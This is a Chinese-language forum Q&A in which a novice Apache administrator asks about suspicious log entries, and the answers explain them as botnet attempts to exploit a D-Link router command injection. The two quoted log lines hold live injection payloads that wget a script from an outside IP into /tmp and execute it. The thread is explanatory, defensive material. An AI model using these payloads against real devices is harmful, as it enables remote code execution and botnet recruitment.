我正在建立一個新的伺服器Apache,實際上我正在學習,所以我正在嘗試不同的事情。我的安全系統已經完成,但當然我可能會錯過一些東西,或者,如果沒有,我確實明白今天沒有一個系統可以100%保護我。那麼,為什麼我認為有人嘗試過我,只是因為我在日誌中收到了以下內容:
1.53.11.43 - - [01/Sep/2018:23:48:30 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://148.72.176.78/ngynx%20-O%20-%3E%20/tmp/ngynx;sh%20/tmp/ngynx%27$ HTTP/1.1" 400 566 "-" "Hakai/2.0"
41.47.195.103 - - [01/Sep/2018:22:48:49 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://77.87.77.250/izuku.sh%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 566
還有更多。我知道有人收到錯誤 400,這對我來說還不錯。所以,事實上我的問題不是他們是否嘗試我,因為我認為是,因為這似乎不是對我的網站的正常請求。我想得到這個請求的解釋來理解和學習。他們實際上想要做什麼,找到我的登入系統並將其發送給某人?
PS我已經知道wget可以下載一些網站,我還發現這login.cgi是一個基於cookie的身份驗證程式。
謝謝你!
答案1
您不受歡迎的訪客並不是試圖隱藏他在您的伺服器上下載並執行某些腳本的嘗試。
他可能期望,您不僅有這樣的login.cgi腳本,而且還沒有正確處理其輸入,因此直接執行撇號之後的所有內容(%27在編碼日誌中)。您可能沒有這樣易受攻擊的腳本,但 HTTP 程式碼 400 始終意味著您不受影響的假設是沒有根據的。
這很可能是無人值守的攻擊,針對大量隨機目標。人們只能推測要下載和執行的腳本可能包含什麼內容。可以安全地假設您將無法確定這一點,因為提供腳本的伺服器通常會提供不同的腳本(+),這取決於它是否假設攻擊到目前為止是成功的,還是正在調查中。
攻擊者也完全有可能認為程式碼執行不太可能,而他只是在收集有關您系統的資訊。所有面向互聯網的裝置都應該定期收到此類請求,並且 Web 伺服器上的所有腳本都應該以您永遠不必擔心的方式編寫。
(+)為什麼攻擊者會提供不同的腳本嗎?使調查妥協後的權限升級變得更加困難。該腳本稍後可能會從記憶體中丟失,因此確保受害者稍後無法檢索該腳本對於攻擊者來說是有意義的。如何攻擊者會提供不同的腳本嗎?他將確保 Web 伺服器在攻擊發生後不久僅回復來自受攻擊電腦 IP 的攻擊負載。由於攻擊只能立即成功或失敗,因此以後對腳本的任何檢索都可以歸因於受害者取證團隊或安全研究人員。這不是一種新的或純理論的機制,我在 2016 年確實收到了基於 IP 的不同有效負載(一個腳本為空,另一個包含加載第三階段有效負載的命令)。
答案2
這不是針對您個人的具體攻擊。殭屍網路很可能用於攻擊許多到所有可能的 IP 位址。
login.cli使用參數的腳本似乎cli針對 D-Link 路由器。它可能是一個變體D-Link DSL-2750B - 作業系統指令注入:
此模組利用了 D-Link DSL-2750B 設備中的遠端命令注入漏洞。漏洞可以透過直接用於呼叫“ayecli”二進位檔案的“cli”參數來利用。易受攻擊的韌體範圍為 1.01 至 1.03。
您可以使用 nginx 或 Apache 等 Web 伺服器的封鎖清單集合來封鎖所有此類請求。根據您的流量,執行此操作可能會很有用,特別是如果您有一個小型私人網站,預計流量不會很大。
答案3
我知道這篇文章已經發布了一年多了,但是,我可以對此進行一些澄清。
它確實是殭屍網路的一部分。它嘗試下載的腳本是一個釋放器,它嘗試下載、向下載的檔案(刪除的檔案)添加可執行位元/權限,然後執行然後刪除該檔案。
我對這個新版本的dropper做了一些分析,它是一個未編碼的shell腳本。隨著 2020 年的臨近,這個網路今天再次變得活躍。
至於使用不同腳本的問題,開發人員可以製作單獨的腳本來在不同的作業系統上運行。看起來好像有人重新包裝了這個殭屍網路並試圖重新分發它。這是病毒總數圖形這顯示了這個特定殭屍網路的新活動。